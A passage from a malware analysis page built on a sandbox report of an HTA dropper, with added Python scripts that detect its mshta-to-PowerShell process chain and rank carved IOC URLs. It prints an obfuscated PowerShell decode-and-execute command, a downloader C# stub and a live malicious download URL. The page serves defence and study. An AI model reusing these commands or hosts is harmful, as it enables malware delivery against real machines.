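    'PoWeRsHeLl -eX bYpAsS -NoP -w 1 -c "iEx($(iex(\'[System.Text.Encoding]\'+[char]58+[char]58'
    "+'UTF8.GetString([System.Convert]'+[char]58+[char]58"
    "+'FromBase64String('+[char]0x22+'QUJD'+[char]0x22+'))')))\""
)
EVENTS = [
    {"pid": 7400, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\user\Desktop\sdf.hta"'},
    {"pid": 7500, "ppid": 7400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c ' + PS_CMD},
    {"pid": 7600, "ppid": 7500,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PS_CMD},
    {"pid": 7700, "ppid": 7600,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig '
                r'/fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"'},
    {"pid": 7800, "ppid": 7700,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe",
     "cmdline": r'cvtres.exe /NOLOGO /READONLY "/OUT:C:\Users\user\AppData\Local\Temp\RES1A2B.tmp"'},
    {"pid": 9001, "ppid": 4100, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
]

USUAL_PS_CASINGS = {"powershell", "Powershell", "PowerShell", "POWERSHELL"}
# Interpreters / LOLBins that have no business being spawned by an HTA host.
MSHTA_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "mshta.exe"}


def basename(image):
    return ntpath.basename(image).lower()


def powershell_case_anomaly(cmdline):
    """True when a 'powershell' token uses a casing outside the usual spellings."""
    return any(m.group(0) not in USUAL_PS_CASINGS
               for m in re.finditer(r"powershell", cmdline, re.IGNORECASE))


def decode_and_execute(cmdline):
    """FromBase64String feeding iex/Invoke-Expression: the decode-and-execute pattern."""
    return (re.search(r"frombase64string", cmdline, re.I) is not None
            and re.search(r"\biex\b|invoke-expression", cmdline, re.I) is not None)


def char_concat_obfuscation(cmdline, threshold=3):
    """Strings assembled from [char]NN fragments to hide '::', quotes and the like."""
    return len(re.findall(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", cmdline, re.I)) >= threshold


def csc_from_user_profile(image, cmdline):
    """csc.exe fed a .cmdline response file from under a user profile (assumed path shape)."""
    return (basename(image) == "csc.exe"
            and re.search(r"\\Users\\[^\\]+\\AppData\\.*\.cmdline", cmdline, re.I) is not None)


def analyze(events):
    """Return (pid, rule_name) pairs for every event that trips a check."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) == "mshta.exe" and basename(e["image"]) in MSHTA_CHILDREN:
            findings.append((e["pid"], "suspicious_mshta_child"))
        if powershell_case_anomaly(e["cmdline"]):
            findings.append((e["pid"], "powershell_case_anomaly"))
        if decode_and_execute(e["cmdline"]):
            findings.append((e["pid"], "powershell_decode_and_execute"))
        if char_concat_obfuscation(e["cmdline"]):
            findings.append((e["pid"], "char_concat_obfuscation"))
        if csc_from_user_profile(e["image"], e["cmdline"]):
            findings.append((e["pid"], "csc_compile_from_user_profile"))
    return findings


def ancestry(events, pid):
    """Process names from the oldest known ancestor down to pid."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for pid, rule in analyze(EVENTS):
        print(f"{pid} {rule:32} {' > '.join(ancestry(EVENTS, pid))}")
```

The string checks are cheap to evade: a payload passed with -EncodedCommand shows neither FromBase64String nor [char] on the command line, and a normally cased "powershell" passes the casing test. The parent/child check and the ancestry walk do not depend on the command line at all, which is why an mshta.exe (or Office) parent spawning an interpreter should alert on its own and the other rules only raise the severity.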

Antivirus detection (submitted sample):
    Source: sdf.hta | Detection: 31% | Scanner: ReversingLabs | Label: Script-WScript.Trojan.Leonem
    Source: SAMPLE | Detection: 100% | Scanner: Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Antivirus detection (URLs):
    Source: http://172.245.191.88/620/csrss. | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
    Source: http://172.245.191.88/620/csrss.exe | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
    Source: http://172.245.191.88/620/csrss.exe# | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
No contacted domains info
Contacted URLs:
    Name: http://172.245.191.88/620/csrss.exe | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
URLs from memory and dropped files (Name | Source | Malicious | Antivirus Detection | Reputation):
    https://g.live.com/odclientsettings/Prod.C: | edb.log.5.dr | false | high
    http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://g.live.com/odclientsettings/ProdV2 | edb.log.5.dr | false | high
    http://crl.micro | powershell.exe, 00000003.00000002.1275197546.0000000007730000.00000004.00000020.00020000.00000000.sdmp | false | high
    http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.dr | false | high
    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp | false | high
    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | false | high
    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://contoso.com/ | powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | false | high
    http://www.microsoft.co | powershell.exe, 00000003.00000002.1277241225.00000000087D7000.00000004.00000020.00020000.00000000.sdmp | false | high
    https://contoso.com/License | powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://contoso.com/Icon | powershell.exe, 00000003.00000002.1271303624.000000000601A000.00000004.00000800.00020000.00000000.sdmp | false | high
    http://172.245.191.88/620/csrss.exe# | powershell.exe, 00000003.00000002.1277241225.00000000087E9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://crl.ver) | svchost.exe, 00000005.00000002.2396772651.0000020AE7400000.00000004.00000020.00020000.00000000.sdmp | false | high
    https://g.live.com/odclientsettings/ProdV2.C: | edb.log.5.dr | false | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1268592235.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp | false | high
    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000005.00000003.1204327509.0000020AE76C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr | false | high
    https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1268592235.0000000005107000.00000004.00000800.00020000.00000000.sdmp | false | high
    http://172.245.191.88/620/csrss. | powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted public IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
    172.245.191.88 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
Contacted private IPs:
    127.0.0.1
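Three of the URLs listed above are the same download cut at different lengths (csrss., csrss.exe, csrss.exe#), and most of the rest (aka.ms, contoso.com, nuget.org, schemas.xmlsoap.org, g.live.com) are PowerShell module help text, PSGallery manifest templates and the OneDrive updater rather than anything the sample did. The Avira "safe" / 0% verdicts on the IP-hosted URL mean only that it has no reputation history: the behavior graph shows powershell.exe fetching from that IP on port 80, and the context table below ties the same IP to earlier Cobalt Strike and Remcos deliveries. The Python below is an added example written for this page, not part of the Joe Sandbox report; it merges carved URL strings into one IOC per distinct URL and ranks them. The input rows, the noise-host allowlist and the priority labels are my assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed input in the shape of this report's "URLs from memory" table:
# (carved string, where it was carved from). The region labels are assumed.
RAW = [
    ("http://172.245.191.88/620/csrss.", "powershell.exe memory (assumed region A)"),
    ("http://172.245.191.88/620/csrss.exe", "powershell.exe memory (assumed region B)"),
    ("http://172.245.191.88/620/csrss.exe#", "powershell.exe memory (assumed region C)"),
    ("https://aka.ms/pscore6lB", "powershell.exe memory"),
    ("http://crl.micro", "powershell.exe memory"),
    ("https://contoso.com/License", "powershell.exe memory"),
    ("https://g.live.com/odclientsettings/ProdV2", "edb.log (svchost.exe)"),
    ("http://nuget.org/NuGet.exe", "powershell.exe memory"),
]

# Hosts that show up in PowerShell / .NET / BITS memory regardless of the sample
# (module help text, PSGallery manifest templates, OneDrive updater). This
# allowlist is an assumption; tune it against your own clean baselines.
NOISE_HOSTS = {
    "aka.ms", "contoso.com", "nuget.org", "g.live.com", "schemas.xmlsoap.org",
    "github.com", "pesterbdd.com", "www.apache.org",
}


def defang(url):
    """hxxp://1[.]2[.]3[.]4/x[.]exe form so the IOC cannot be clicked by accident."""
    return re.sub(r"^http", "hxxp", url, flags=re.I).replace(".", "[.]")


def priority(host, path):
    is_ip = re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) is not None
    payload = path.lower().endswith((".exe", ".dll", ".hta", ".ps1", ".txt"))
    if is_ip and payload:
        return "high"      # IP-literal host serving an executable: the report's download
    if not path:
        return "low"       # host only, usually a cut-off carved string (e.g. http://crl.micro)
    return "medium"


def normalize(raw):
    """Merge carved URL strings into one IOC per distinct URL."""
    cleaned = {}
    for s, src in raw:
        s = s.strip().rstrip("#)\"'")          # junk left behind by string carving
        cleaned.setdefault(s, set()).add(src)
    # A string that is a strict prefix of another carved string is a truncated
    # copy of it: drop it and fold its sources into the longer one.
    keep = [s for s in cleaned if not any(o != s and o.startswith(s) for o in cleaned)]
    results = []
    for s in sorted(keep):
        parts = urlsplit(s)
        host = parts.hostname or ""
        if host in NOISE_HOSTS:
            continue
        sources = set().union(*(cleaned[o] for o in cleaned if s.startswith(o)))
        results.append({
            "ioc": s,
            "host": host,
            "port": parts.port or (443 if parts.scheme == "https" else 80),
            "priority": priority(host, parts.path),
            "sources": sorted(sources),
            "defanged": defang(s),
        })
    return results


if __name__ == "__main__":
    for r in normalize(RAW):
        print(f'{r["priority"]:6} {r["defanged"]}  <- {", ".join(r["sources"])}')
```

Carved strings that were cut inside the host name (http://crl.micro, http://www.microsoft.co in the table above) cannot be repaired automatically; the script keeps them at low priority for the analyst instead of guessing a completion.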
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1665127
Start date and time: 2025-04-15 09:43:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sdf.hta
Detection: MAL
Classification: mal92.expl.evad.winHTA@11/15@0/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 83%
• Number of executed functions: 8
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .hta
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.213.193, 4.175.87.197
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Timeline (Time | Type | Description):
    03:44:08 | API Interceptor | 38x Sleep call for process: powershell.exe modified
    03:44:11 | API Interceptor | 2x Sleep call for process: svchost.exe modified
Context: IP 172.245.191.88 seen in other analyses (Associated Sample Name | Detection | Threat Name | Context URL):
    creatingbestthingsforbetterfuture.hta | malicious | Cobalt Strike, Remcos, DBatLoader | 172.245.191.88/90/sihost.exe
    Solicitud de cotización.xls | malicious | Remcos, DBatLoader | 172.245.191.88/xampp/hmo/creatingbestthingsforbetterfuture.hta
    goodisthebestthingsbetterwaytotellhimbestfor.hta | malicious | Remcos | 172.245.191.88/992/goodisthebestthingsbetterwaytotellhimbestfor.txt
    Quotation.xls (3 submissions) | malicious | Unknown | 172.245.191.88/992/goodisthebestthingsbetterwaytotellhimbestfor.hta?&espalier
    earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta | malicious | Remcos | 172.245.191.88/660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt
    Quotation.xls | malicious | Unknown | 172.245.191.88/660/earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta?&permit=hurried&zipper
    verysurethingsonherewithgreatthings.hta | malicious | Cobalt Strike, Remcos | 172.245.191.88/880/verysurethingsonherewithgreatthings.txt
    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx | malicious | Unknown | 172.245.191.88/880/eswa/verysurethingsonherewithgreatthings.hta
Context: ASN AS-COLOCROSSINGUS seen in other analyses (Associated Sample Name | Detection | Threat Name | Context IP):
    GFL-001-2034-PO-BK - REV.docx.doc (2 submissions) | malicious | Unknown | 192.3.140.103
    nabmpsl.elf | malicious | Unknown | 107.175.74.44
    truelifewithmanmadethingsonherefor.hta | malicious | Cobalt Strike, DBatLoader, FormBook | 192.3.26.143
    fgd.hta | malicious | Cobalt Strike, DBatLoader, FormBook | 192.3.26.143
    bestgreatfeelingigotfromtheworkthfulplaceback.hta | malicious | Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 192.3.26.143
    SecuriteInfo.com.FileRepMalware.15881.18357.exe | malicious | GuLoader | 192.210.150.28
    cwilliams-Statement-bak.zip (2 submissions) | malicious | ScreenConnect Tool | 23.94.126.136
    shegivenmekissinglips.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | 104.168.7.18
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3073743969761993
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrb:KooCEYhgYEL0In
MD5: 144003AEA2AE770608415F5A8B3149A7
SHA1: E96B92CAD7F7E56AE63E64698DE5729BF738DCA6
SHA-256: 3AA9BFED275112412010AFDEF1F11F0F75D7486381A66E84199A6E32E1E2D359
SHA-512: E7206B26F0C0D37B6A687456086F0047A459F825FF873FB14B1714DBDC78D9132A5CE4E36183978DFF84A0416ADED80A72A0597AE7F5A5FB639187E1AB845D92
Malicious: false
Reputation: low
                                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x073e61e7, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.42211276906611905
Encrypted: false
SSDEEP: 1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
MD5: 33C5DCA92646FBBD857C50D7B09DC3F8
SHA1: FBB92919DF12E68A9BA5E93AA1AFBFE6247620A6
SHA-256: DBB32ED7B71E7357C23A258BC7BF452A364195C2518EE59E8DD4668F13A8B894
SHA-512: A47F527E58FE34D29020401AF35A298F9B08D69415A0A48597574FC2A7A9CDAD0A30831545AA1D8E688940547C0C1A750DC9AE340528124262257BE04A544779
Malicious: false
Reputation: low
                                              Preview:.>a.... .......A.......X\...;...{......................0.!..........{A..,...}'.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................U...,...}'....................^.,...}'..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\svchost.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):0.07537644245221338
                                              Encrypted:false
                                              SSDEEP:3:8ml6Yeesac05Cjn13a/gJiqhH/illcVO/lnlZMxZNQl:V6zUcx53qMiafGOewk
                                              MD5:E9B9F995E1644BC835EF041BAD7760D1
                                              SHA1:32FFB50F14F1EAB8292189C709380FD593E4B6D1
                                              SHA-256:F3EA1F5B1468A2DB265EEEA0BAC65FDBD2BEB6B24ED20C8430CF8FFE73ACC037
                                              SHA-512:EEF0D606FD654F08C579806A4050720D0CCDE16755699817D4B79BC48083E7146458F46E93C1A9B0CC91E65C3C53851DEF5D3C7BB4FAA2DADC9832AF81D442BD
                                              Malicious:false
                                              Reputation:low
                                              Preview:,_<\.....................................;...{...,...}'......{A..............{A......{A..........{A]...................^.,...}'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1328
                                              Entropy (8bit):5.405945905705216
                                              Encrypted:false
                                              SSDEEP:24:3K1yt4WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8UHr8Htq:sy+WSU4y4RQmFoUeWmfmZ9tK8NWR8Wz
                                              MD5:9C281D358046B48EB59A6191AE09C10B
                                              SHA1:A03BFEBAD0421C7287691A9B79D908B42271CD2C
                                              SHA-256:3829DABEDBA2453B64AE8C0C100023492F4A3CD89DF2F54062570BAE76CF3C1B
                                              SHA-512:3A8E0ED6827AA93A786644ED7A001AB421975753D9BA762ADB76CEE16D38BDEE43FD4684023D678C1DB5E3E27E347725AB82159BF0BB0BF9622C02B1080B7F0C
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Apr 15 08:52:04 2025, 1st section name ".debug$S"
                                              Category:dropped
                                              Size (bytes):1328
                                              Entropy (8bit):3.988784456218827
                                              Encrypted:false
                                              SSDEEP:24:HZxe9E2+fkEXDfHYwKEbsmfII+ycuZhN+akSmPNnqSqd:5DkEzHKPmg1ul+a3aqSK
                                              MD5:539EEA3F3EA5854EF5EB00DAC0AB5EAF
                                              SHA1:01DE70027DEFC3A44C7BAF58A8EB02522E548A25
                                              SHA-256:2E17C6F00AA13834202D6307EB753F2B0977AC3F3235A33B53721AEEC55AC1BC
                                              SHA-512:909A79FE2768ADC385236033260626D6054C88B52DC253AA627E531D76B525A18FA208C376724712BFCFDAFC92EA567EA72E98D282F9FBD26F7E94BA8D804A2C
                                              Malicious:false
                                              Preview:L...4..g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP.................w.._...*..$.^..........4.......C:\Users\user\AppData\Local\Temp\RESFA6B.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.1.p.l.2.e.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):652
                                              Entropy (8bit):3.1004065432448833
                                              Encrypted:false
                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCvak7YnqqJIPN5Dlq5J:+RI+ycuZhN+akSmPNnqX
                                              MD5:CDEFBE77DDC15F05DBC72A7FED248B5E
                                              SHA1:3D596D82A4097968DC9BA8829B9A45827AE5F466
                                              SHA-256:2633B339723EF18BFCD4F78B71DDA536FD1385109D4057AA09E1F77761725B7C
                                              SHA-512:902D5A00B9B927E6076A770F70BE448D694643B52A7F14078E2843E27F496D315F42A230335EE0F954D2A4FD390C71D8D712E1C642E0BC4678A70B63C91AA6C6
                                              Malicious:false
                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.1.p.l.2.e.q.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.1.p.l.2.e.q.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (368)
                                              Category:dropped
                                              Size (bytes):485
                                              Entropy (8bit):3.8179586298986012
                                              Encrypted:false
                                              SSDEEP:6:V/DsYLDS81zust9iMmhQXReKJ8SRHy4HOW7ZCv7IIrxOFQy:V/DTLDfusXfXfHKqji5y
                                              MD5:211A5B49430B6CAA90A540990FF2AD2E
                                              SHA1:8D69C08B8E4FE212B5EE4FB8CECC5B7F6F8A8FFB
                                              SHA-256:3F46F52F3B3467520DF1CB84C1BD819594EFB57A8C0C766729F9E1676544CCA8
                                              SHA-512:8412865BF893D56CF63E3CBFE40AC41BD1E6468E210B3A656258CDF93C622B9B39B50A5E6AE4EF93307960DDC5FC7D0C098500152EA9B3AF417227A55C0C659D
                                              Malicious:false
                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace BHtY.{. public class tJVgxAyKo. {. [DllImport("uRlMON.DLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr mqhypVwGTeo,string JXgK,string Woj,uint tfuukZ,IntPtr QTuGN);.. }..}.
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                              Category:dropped
                                              Size (bytes):369
                                              Entropy (8bit):5.243831769386129
                                              Encrypted:false
                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f7Uzxs7+AEszIwkn23f7Rn:p37Lvkmb6KRfQWZEifNn
                                              MD5:0AE90BE6AD268293BE6A067F36F1CF6A
                                              SHA1:6084B5D84B54F1F5EB47176F659320B297A302FE
                                              SHA-256:102B8E5E67FDAEE339C8333CE0290CFBB9CFEA5E6099572AFF6C2FAD2F3CB48F
                                              SHA-512:5F8BE25E5EF52367C928044EA5AA0E74B0E359376263DC1B5565B7938DFA41056436991D86028FA170C32A61794FC723A4E65A8D4DEACF33B0CE5673CB75A49C
                                              Malicious:true
                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.0.cs"
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):3072
                                              Entropy (8bit):2.8463672799352424
                                              Encrypted:false
                                              SSDEEP:24:etGSL9PBe5ekrl8s1igkpjq3dm3AtkZfeybCZ0WI+ycuZhN+akSmPNnq:6LWskr+8kjz3JeybCZX1ul+a3aq
                                              MD5:0E12010E8CEE22178C474FBE369E8BFD
                                              SHA1:2348ADBC7169DD3B765C541C66F46F1C4C94D249
                                              SHA-256:7E173C68F133C5EB0E8D84FCF549406572F26D902C30E04BDCB02448C3C2ACAE
                                              SHA-512:5405AD540DC25B2898D120FA677D6D7B07532A8C119958B7986804A8E49C7B99F1AF450924964B180A7AC1A33388DC99F44719E72DBE95B540DC51C3FD8470CA
                                              Malicious:false
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4..g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....w.....w...........................!.............. =.....P ......O.........U.....a.....f.....j.....q...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.l1
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):867
                                              Entropy (8bit):5.325131463789254
                                              Encrypted:false
                                              SSDEEP:24:KJBqd3ka6KRfREifIKax5DqBVKVrdFAMBJTH:Cika6CREuIK2DcVKdBJj
                                              MD5:BED560B3628DD1ACC9DFDF14E8D7B76D
